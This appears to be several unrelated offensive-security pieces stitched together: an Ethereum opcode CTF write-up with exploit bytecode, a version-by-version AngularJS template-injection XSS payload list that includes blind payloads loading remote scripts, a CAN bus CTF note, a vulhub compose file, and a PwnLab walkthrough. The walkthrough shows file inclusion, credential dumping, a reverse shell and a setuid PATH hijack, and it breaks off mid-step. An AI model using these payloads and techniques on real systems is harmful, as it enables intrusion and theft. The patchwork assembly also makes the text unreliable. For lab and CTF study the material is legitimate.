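tshark -r capture.pcap \
  -o "ssl.keys_list:0.0.0.0,443,http,server.key.insecure" \
  -Y http -V
```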
sec-knowleage
# Ethereum Opcodes

There are 142 opcodes in Ethereum. Some of the most common ones are listed below:

| Uint8 | Mnemonic | Stack Input | Stack Output | Expression |
| :---: | :------: | :--------------------: | :----------: | :----------------------------------: |
| 00 | STOP | - | - | STOP() |
| 01 | ADD | \| a \| b \| | \| a + b \| | a + b |
| 02 | MUL | \| a \| b \| | \| a * b \| | a * b |
| 03 | SUB | \| a \| b \| | \| a - b \| | a - b |
| 04 | DIV | \| a \| b \| | \| a // b \| | a // b |
| 51 | MLOAD | \| offset \| | \| value \| | value = memory[offset:offset+32] |
| 52 | MSTORE | \| offset \| value \| | - | memory[offset:offset+32] = value |
| 54 | SLOAD | \| key \| | \| value \| | value = storage[key] |
| 55 | SSTORE | \| key \| value \| | - | storage[key] = value |
| 56 | JUMP | \| destination \| | - | $pc = destination |
| 5B | JUMPDEST | - | - | - |
| F3 | RETURN | \| offset \| length \| | - | return memory[offset:offset+length] |
| FD | REVERT | \| offset \| length \| | - | revert(memory[offset:offset+length]) |

!!! info
    JUMPDEST marks a valid destination for jump instructions; a jump instruction cannot jump to a location that does not carry a JUMPDEST.

More detailed opcode information can be found at [ethervm.io](https://ethervm.io).

## Example

Let's use the StArNDBOX challenge from starCTF 2021 to illustrate how an opcodes challenge works.

When the challenge contract is deployed, 100 wei are transferred into it; our goal is to drain the contract's balance to zero. The source code of the challenge contract is as follows:

```solidity
pragma solidity ^0.5.11;

library Math {
    function invMod(int256 _x, int256 _pp) internal pure returns (int) {
        int u3 = _x;
        int v3 = _pp;
        int u1 = 1;
        int v1 = 0;
        int q = 0;
        while (v3 > 0){
            q = u3/v3;
            u1= v1;
            v1 = u1 - v1*q;
            u3 = v3;
            v3 = u3 - v3*q;
        }
        while (u1<0){
            u1 += _pp;
        }
        return u1;
    }

    function expMod(int base, int pow,int mod) internal pure returns (int res){
        res = 1;
        if(mod > 0){
            base = base % mod;
            for (; pow != 0; pow >>= 1) {
                if (pow & 1 == 1) {
                    res = (base * res) % mod;
                }
                base = (base * base) % mod;
            }
        }
        return res;
    }

    function pow_mod(int base, int pow, int mod) internal pure returns (int res) {
        if (pow >= 0) {
            return expMod(base,pow,mod);
        } else {
            int inv = invMod(base,mod);
            return expMod(inv,abs(pow),mod);
        }
    }

    function isPrime(int n) internal pure returns (bool) {
        if (n == 2 ||n == 3 || n == 5) {
            return true;
        } else if (n % 2 ==0 && n > 1 ){
            return false;
        } else {
            int d = n - 1;
            int s = 0;
            while (d & 1 != 1 && d != 0) {
                d >>= 1;
                ++s;
            }
            int a=2;
            int xPre;
            int j;
            int x = pow_mod(a, d, n);
            if (x == 1 || x == (n - 1)) {
                return true;
            } else {
                for (j = 0; j < s; ++j) {
                    xPre = x;
                    x = pow_mod(x, 2, n);
                    if (x == n-1){
                        return true;
                    }else if(x == 1){
                        return false;
                    }
                }
            }
            return false;
        }
    }

    function gcd(int a, int b) internal pure returns (int) {
        int t = 0;
        if (a < b) {
            t = a;
            a = b;
            b = t;
        }
        while (b != 0) {
            t = b;
            b = a % b;
            a = t;
        }
        return a;
    }

    function abs(int num) internal pure returns (int) {
        if (num >= 0) {
            return num;
        } else {
            return (0 - num);
        }
    }
}

contract StArNDBOX{
    using Math for int;
    constructor()public payable{
    }
    modifier StAr() {
        require(msg.sender != tx.origin);
        _;
    }
    function StArNDBoX(address _addr) public payable{
        uint256 size;
        bytes memory code;
        int res;

        assembly{
            size := extcodesize(_addr)
            code := mload(0x40)
            mstore(0x40, add(code, and(add(add(size, 0x20), 0x1f), not(0x1f))))
            mstore(code, size)
            extcodecopy(_addr, add(code, 0x20), 0, size)
        }
        for(uint256 i = 0; i < code.length; i++) {
            res = int(uint8(code[i]));
            require(res.isPrime() == true);
        }
        bool success;
        bytes memory _;
        (success, _) = _addr.delegatecall("");
        require(success);
    }
}
```

As we can see, the challenge's `StArNDBoX` function copies the code of an arbitrary address, checks that every byte of that code is a prime number, and, if the check passes, calls the target contract via `delegatecall`.

However, the contract's `isPrime` function is not a complete primality test: `00` and `01` also pass the check. We can therefore construct the following bytecode:

```
// 0x6100016100016100016100016100016100650361000161fbfbf1
61 00 01 | PUSH2 0x0001
61 00 01 | PUSH2 0x0001
61 00 01 | PUSH2 0x0001
61 00 01 | PUSH2 0x0001
61 00 01 | PUSH2 0x0001
61 00 65 | PUSH2 0x0065
03       | SUB
61 00 01 | PUSH2 0x0001
61 fb fb | PUSH2 0xfbfb
f1       | CALL
```

This executes the equivalent of `address(0x0001).call.gas(0xfbfb).value(0x0065 - 0x0001)`, i.e. it transfers the challenge contract's balance to address 0x1, emptying the balance and satisfying the condition for obtaining the flag. (A small offline checker for the contract's byte filter is sketched at the end of this page, after the references.)

## Challenges

### starCTF 2021

- Challenge name: StArNDBOX

### RealWorld 2019

- Challenge name: Montagy

### QWB 2020

- Challenge name: EasySandbox
- Challenge name: EGM

### Huawei Kunpeng Computing 2020

- Challenge name: boxgame

!!! note
    Note: challenge attachments can be found in the [ctf-challenges/blockchain](https://github.com/ctf-wiki/ctf-challenges/tree/master/blockchain) repository.

## References

- [Ethervm](https://ethervm.io)
- [starCTF 2021 - StArNDBOX](https://github.com/sixstars/starctf2021/tree/main/blockchain-StArNDBOX)
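As promised above, here is a minimal offline checker for the contract's byte filter, useful for validating a candidate payload before deploying anything. For single-byte values the contract's one-round base-2 Miller-Rabin test agrees with true primality, except that `0x00` and `0x01` also slip through, so the sketch models the filter as "prime, or 0, or 1"; the payload hex string is the one derived above.

```python
def passes_filter(b: int) -> bool:
    # 0x00 and 0x01 are accepted because the contract's isPrime() is incomplete.
    if b in (0, 1):
        return True
    if b < 2 or (b % 2 == 0 and b != 2):
        return False
    # Trial division is exact here; for values < 256 it matches the
    # contract's single base-2 Miller-Rabin round.
    return all(b % d for d in range(3, int(b ** 0.5) + 1, 2))

payload = bytes.fromhex("6100016100016100016100016100016100650361000161fbfbf1")
assert all(passes_filter(b) for b in payload), "payload contains a rejected byte"
print("all %d bytes pass the filter" % len(payload))
```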
# XSS in Angular and AngularJS ## Client Side Template Injection The following payloads are based on Client Side Template Injection. ### Stored/Reflected XSS - Simple alert in AngularJS > AngularJS as of version 1.6 have removed the sandbox altogether AngularJS 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin) ```javascript {{constructor.constructor('alert(1)')()}} ``` AngularJS 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265) ```javascript {{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}} ``` Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=<brute+ng-app>%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D) AngularJS 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830) ```javascript {{0[a='constructor'][a]('alert(1)')()}} {{$eval.constructor('alert(1)')()}} {{$on.constructor('alert(1)')()}} ``` AngularJS 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh) ```javascript {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }} ``` AngularJS 1.5.0 - 1.5.8 ```javascript {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} ``` AngularJS 1.4.0 - 1.4.9 ```javascript {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} ``` AngularJS 1.3.20 ```javascript {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} ``` AngularJS 1.3.19 ```javascript {{ 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; $eval('x=alert(1)//'); }} ``` AngularJS 1.3.3 - 1.3.18 ```javascript {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)//'); }} ``` AngularJS 1.3.1 - 1.3.2 ```javascript {{ {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=''.valueOf; $eval('x=alert(1)//'); }} ``` AngularJS 1.3.0 ```javascript {{!ready && (ready = true) && ( !call ? 
$$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )) );}} ``` AngularJS 1.2.24 - 1.2.29 ```javascript {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} ``` AngularJS 1.2.19 - 1.2.23 ```javascript {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}} ``` AngularJS 1.2.6 - 1.2.18 ```javascript {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} ``` AngularJS 1.2.2 - 1.2.5 ```javascript {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}} ``` AngularJS 1.2.0 - 1.2.1 ```javascript {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}} ``` AngularJS 1.0.1 - 1.1.5 and Vue JS ```javascript {{constructor.constructor('alert(1)')()}} ``` ### Advanced bypassing XSS AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter.com/VirenPawar_) ```javascript {{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}} ``` AngularJS (without `'` single and `"` double quotes and `constructor` string) ```javascript {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} ``` ```javascript {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} ``` ```javascript {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} ``` ```javascript {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} ``` AngularJS bypass Waf [Imperva] ```javascript {{x=['constr', 'uctor'];a=x.join('');b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'pr\\u{6f}mpt(d\\u{6f}cument.d\\u{6f}main)')()}} ``` ### Blind XSS 1.0.1 - 1.1.5 && > 1.6.0 by Mario Heiderich (Cure53) ```javascript {{ constructor.constructor("var _ = document.createElement('script'); _.src='//localhost/m'; document.getElementsByTagName('body')[0].appendChild(_)")() }} ``` Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsys) and Gareth Heyes (PortSwigger) ```javascript {{ $on.constructor("var _ = document.createElement('script'); _.src='//localhost/m'; document.getElementsByTagName('body')[0].appendChild(_)")() }} ``` 1.2.0 - 1.2.5 by Gareth Heyes (PortSwigger) ```javascript {{ a="a"["constructor"].prototype;a.charAt=a.trim; $eval('a",eval(`var _=document\\x2ecreateElement(\'script\'); _\\x2esrc=\'//localhost/m\'; 
document\\x2ebody\\x2eappendChild(_);`),"') }} ``` 1.2.6 - 1.2.18 by Jan Horn (Cure53, now works at Google Project Zero) ```javascript {{ (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'eval(" var _ = document.createElement(\'script\'); _.src=\'//localhost/m\'; document.getElementsByTagName(\'body\')[0].appendChild(_)")')() }} ``` 1.2.19 (FireFox) by Mathias Karlsson ```javascript {{ toString.constructor.prototype.toString=toString.constructor.prototype.call; ["a",'eval("var _ = document.createElement(\'script\'); _.src=\'//localhost/m\'; document.getElementsByTagName(\'body\')[0].appendChild(_)")'].sort(toString.constructor); }} ``` 1.2.20 - 1.2.29 by Gareth Heyes (PortSwigger) ```javascript {{ a="a"["constructor"].prototype;a.charAt=a.trim; $eval('a",eval(` var _=document\\x2ecreateElement(\'script\'); _\\x2esrc=\'//localhost/m\'; document\\x2ebody\\x2eappendChild(_);`),"') }} ``` 1.3.0 - 1.3.9 by Gareth Heyes (PortSwigger) ```javascript {{ a=toString().constructor.prototype;a.charAt=a.trim; $eval('a,eval(` var _=document\\x2ecreateElement(\'script\'); _\\x2esrc=\'//localhost/m\'; document\\x2ebody\\x2eappendChild(_);`),a') }} ``` 1.4.0 - 1.5.8 by Gareth Heyes (PortSwigger) ```javascript {{ a=toString().constructor.prototype;a.charAt=a.trim; $eval('a,eval(`var _=document.createElement(\'script\'); _.src=\'//localhost/m\';document.body.appendChild(_);`),a') }} ``` 1.5.9 - 1.5.11 by Jan Horn (Cure53, now works at Google Project Zero) ```javascript {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply; c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,eval(`var _=document.createElement(\\'script\\');_.src=\\'//localhost/m\\';document.body.appendChild(_);`)))+';astNode.argument={type:'Identifier',name:'foo'};"); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }} ``` ## Automatic Sanitization > To systematically block XSS bugs, Angular treats all values as untrusted by default. When a value is inserted into the DOM from a template, via property, attribute, style, class binding, or interpolation, Angular sanitizes and escapes untrusted values. However, it is possible to mark a value as trusted and prevent the automatic sanitization with these methods: - bypassSecurityTrustHtml - bypassSecurityTrustScript - bypassSecurityTrustStyle - bypassSecurityTrustUrl - bypassSecurityTrustResourceUrl Example of a component using the unsecure method `bypassSecurityTrustUrl`: ``` import { Component, OnInit } from '@angular/core'; @Component({ selector: 'my-app', template: ` <h4>An untrusted URL:</h4> <p><a class="e2e-dangerous-url" [href]="dangerousUrl">Click me</a></p> <h4>A trusted URL:</h4> <p><a class="e2e-trusted-url" [href]="trustedUrl">Click me</a></p> `, }) export class App { constructor(private sanitizer: DomSanitizer) { this.dangerousUrl = 'javascript:alert("Hi there")'; this.trustedUrl = sanitizer.bypassSecurityTrustUrl(this.dangerousUrl); } } ``` When doing a code review, you want to make sure that no user input is being trusted since it will introduce a security vulnerability in the application. 
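The sanitization escape hatches above are easy to grep for, so a quick triage pass over an Angular codebase can simply flag every call site for manual review. The following is a minimal, hypothetical helper script (not an official Angular tool); the method names are exactly the ones listed above.

```python
import re
import sys
from pathlib import Path

# The DomSanitizer escape hatches listed above; every call site deserves review.
SINKS = re.compile(r"bypassSecurityTrust(?:Html|Script|Style|Url|ResourceUrl)\s*\(")

def scan(root: str) -> None:
    for path in Path(root).rglob("*.ts"):
        for lineno, line in enumerate(path.read_text(errors="ignore").splitlines(), 1):
            if SINKS.search(line):
                print(f"{path}:{lineno}: {line.strip()}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")
```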
## References - [XSS without HTML - CSTI with Angular JS - Portswigger](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs) - [Blind XSS AngularJS Payloads](https://ardern.io/2018/12/07/angularjs-bxss) - [Angular Security](https://angular.io/guide/security) - [Bypass DomSanitizer](https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b)
# CAN opener, CAN, 150pts

> Our operatives have recovered a DeLorean in the ruins of an old mid-west US town. It appears to be locked, but we have successfully accessed its internal communications channels. According to the little data we have, the DeLorean internally uses an archaic technology called CAN bus. We need you to analyze the communications and find a way to unlock the vehicle; once unlocked, recover the secret flag stored inside. We have reason to believe that vehicle entry should be a fairly easy challenge, but to aid you in this, we have restored and reconnected the vehicle dashboard.
> Best of luck.
> The Dashboard app is available here.
> Challenge developed by Argus Cyber Security.

This was the first of the challenges related to CAN bus. The board we got has two CAN controllers, connected to each other, allowing the AVR chip to talk to itself (in a loopback mode, so to say). Apparently it was sending messages through one interface to the other, to simulate a full, car-wide CAN bus.

Connecting a logic analyzer to the CAN bus, we could sniff the sent messages. One of those was particularly interesting - `lock\x00\x00\x00\x00`. We could only think that the opposite of it would be `unlock\x00\x00`...

At that point I had no CAN hardware, but I had... an Arduino. So I wrote a software implementation of CAN bus:

https://gist.github.com/akrasuski1/b1904966c4de0b50672e6fc1fd116d3e

It's not very efficient, does absolutely no error-checking, and the code quality is quite poor, but it was enough to send the unlock message. After the board received it, it sent the flag through the UART interface to the dashboard.
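For readers with real CAN hardware (e.g. a SocketCAN-capable adapter) instead of a bit-banged Arduino, sending the same frame takes only a few lines of python-can. The arbitration ID `0x123` and the `can0` channel are assumptions for illustration - the actual ID would have to be taken from the sniffed `lock` frame.

```python
import can

# Assumes a SocketCAN interface named can0, already configured at the bus bitrate.
bus = can.interface.Bus(channel="can0", bustype="socketcan")

# CAN data fields hold up to 8 bytes; "unlock" is padded with NULs just like
# the sniffed "lock\x00\x00\x00\x00" frame. The arbitration ID is a placeholder.
msg = can.Message(arbitration_id=0x123, data=b"unlock\x00\x00", is_extended_id=False)
bus.send(msg)
print("unlock frame sent")
```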
version: '2'
services:
  web:
    image: vulhub/phpmyadmin:4.8.1
    volumes:
      - ./config.inc.php:/var/www/html/config.inc.php
    ports:
      - "8080:80"
    depends_on:
      - mysql
  mysql:
    image: mysql:5.5
    environment:
      - MYSQL_RANDOM_ROOT_PASSWORD=yes
      - MYSQL_DATABASE=test
      - MYSQL_USER=test
      - MYSQL_PASSWORD=test
# Postbook - FLAG2

## 0x00 New Post

![](./imgs/new_post.jpg)

The new-post form contains a hidden field with **user_id = 2**. Changing it to 1 lets us post as another user.

![](./imgs/test_post.jpg)

## 0x01 FLAG

![](./imgs/flag.jpg)
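The same tampering can be scripted. The sketch below is hypothetical - the endpoint path, field names, and session cookie are guesses based on the screenshots, not taken from the challenge itself:

```python
import requests

# Placeholder values - adjust to the actual challenge instance and session.
BASE = "http://example-postbook.challenge"   # hypothetical host
COOKIES = {"PHPSESSID": "<your session id>"}  # authenticated session

# Submit the new-post form with the hidden user_id changed from 2 to 1,
# so the post is attributed to user 1 instead of our own account.
resp = requests.post(
    f"{BASE}/index.php?page=create.php",      # assumed endpoint
    cookies=COOKIES,
    data={"title": "test", "body": "hello", "user_id": 1},
)
print(resp.status_code)
```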
# PwnLab:init

Download link:

```
https://download.vulnhub.com/pwnlab/pwnlab_init.ova
```

## Walkthrough

The target's IP address is `192.168.0.27`.

Scan the target's ports:

```
┌──(root💀kali)-[~/Desktop]
└─# nmap -sV -p1-65535 192.168.0.27
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 08:15 EST
Nmap scan report for 192.168.0.27
Host is up (0.0026s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
41133/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:E5:CA:92 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.47 seconds
```

Scan the web service on port 80:

```
┌──(root💀kali)-[~/Desktop]
└─# nikto -h http://192.168.0.27/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.27
+ Target Hostname:    192.168.0.27
+ Target Port:        80
+ Start Time:         2021-12-30 08:17:26 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2021-12-30 08:18:16 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

Visiting the web service on port 80 and clicking the upload feature, we are prompted to log in first.

![](<../../.gitbook/assets/image (18) (1) (1).png>)

We test the login form for SQL injection, without success.

![](<../../.gitbook/assets/image (23) (1) (1) (1) (1) (1) (1).png>)

We then notice that a URL of this shape - http://192.168.0.27/?page=login - very likely indicates a **local file inclusion vulnerability**. Since nikto found a `config.php` file, we include `config.php` directly:

```
http://192.168.0.27/?page=php://filter/convert.base64-encode/resource=config
```

![](<../../.gitbook/assets/image (24) (1) (1) (1) (1) (1) (1).png>)

Decode the base64:

```
┌──(root💀kali)-[~/Desktop]
└─# echo PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+ | base64 -d
<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>
```

Connecting to MySQL, we find usernames and passwords (base64-encoded):

```
┌──(root💀kali)-[~/Desktop]
└─# mysql -uroot -pH4u%QJ_H99 -h192.168.0.27                1 ⨯
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 54
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.001 sec)

MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.001 sec)

MySQL [Users]> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.000 sec)
```

Decode the user passwords:

```
┌──(root💀kali)-[~/Desktop]
└─# echo Sld6WHVCSkpOeQ== | base64 -d
JWzXuBJJNy
┌──(root💀kali)-[~/Desktop]
└─# echo U0lmZHNURW42SQ== | base64 -d
SIfdsTEn6I
┌──(root💀kali)-[~/Desktop]
└─# echo aVN2NVltMkdSbw== | base64 -d
iSv5Ym2GRo
```

We upload a reverse shell, but are told that only image files may be uploaded.

![](<../../.gitbook/assets/image (14) (1) (1) (1) (1).png>)

Changing the file extension gives ERROR 001.

![](<../../.gitbook/assets/image (2).png>)

Changing the upload Content-Type gives ERROR 002.

![](<../../.gitbook/assets/image (17) (1) (1) (1).png>)

Changing the Content-Type and adding an image magic header makes the upload go through.

![](<../../.gitbook/assets/image (15) (1) (1) (1) (1) (1).png>)

We try to include the uploaded image webshell through the LFI, but it fails.

`http://192.168.0.27/?page=php://filter/read=convert.base64-encode/resource=upload/450619c0f9b99fca3f46d28787bc55c5.gif`

![](<../../.gitbook/assets/image (6) (1).png>)

We include the `index.php` file instead.

![](<../../.gitbook/assets/image (24) (1) (1) (1) (1) (1).png>)

In the index.php source we can see that a `lang` cookie is passed to `include()`, giving another file inclusion vector (a scripted version of this step is sketched at the end of this page):

```
┌──(root💀kali)-[~]
└─# echo PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4= | base64 -d
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
	if (isset($_GET['page']))
	{
		include($_GET['page'].".php");
	}
	else
	{
		echo "Use this server to upload and share image files inside the intranet";
	}
?>
</center>
</body>
</html>
```

With the `lang` cookie we can include the Linux passwd file.

![](<../../.gitbook/assets/image (25) (1) (1) (1) (1) (1) (1) (1).png>)

We include the uploaded image webshell through the `lang` cookie and catch a reverse shell with nc.

![](<../../.gitbook/assets/image (11) (1) (1).png>)

Spawn a proper bash terminal for more convenient output:

```
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@pwnlab:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Listing the home directory, we find the users from the MySQL database:

```
www-data@pwnlab:/$ ls
ls
bin   dev  home        lib         media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lost+found  mnt    proc  run   srv   tmp  var
www-data@pwnlab:/$ cd /home
cd /home
www-data@pwnlab:/home$ ls
ls
john  kane  kent  mike
```

Using kane's password from above, we escalate and find a binary named `msgmike`:

```
kent@pwnlab:~$ su kane
su kane
Password: iSv5Ym2GRo

kane@pwnlab:/home/kent$ cd /home/kane
kane@pwnlab:~$ ls
msgmike
kane@pwnlab:~$ file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
```

We can see that `msgmike` tries to read `msg.txt` in mike's home directory:

```
kane@pwnlab:~$ ./msgmike
cat: /home/mike/msg.txt: No such file or directory
kane@pwnlab:~$ string msgmike
bash: string: command not found
kane@pwnlab:~$ strings msgmike
strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
QVh[
[^_]
cat /home/mike/msg.txt
;*2$"(
GCC: (Debian 4.9.2-10) 4.9.2
GCC: (Debian 4.8.4-1) 4.8.4
```

![](<../../.gitbook/assets/image (27) (1) (1) (1) (1) (1) (1).png>)

The msgmike source presumably looks like:

```
int main()
{
    system("cat /home/mike/msg.txt");
}
```

Check the environment. The binary runs setuid/setgid as mike and invokes `cat` through `system()` without an absolute path, so we can hijack `PATH`:

```
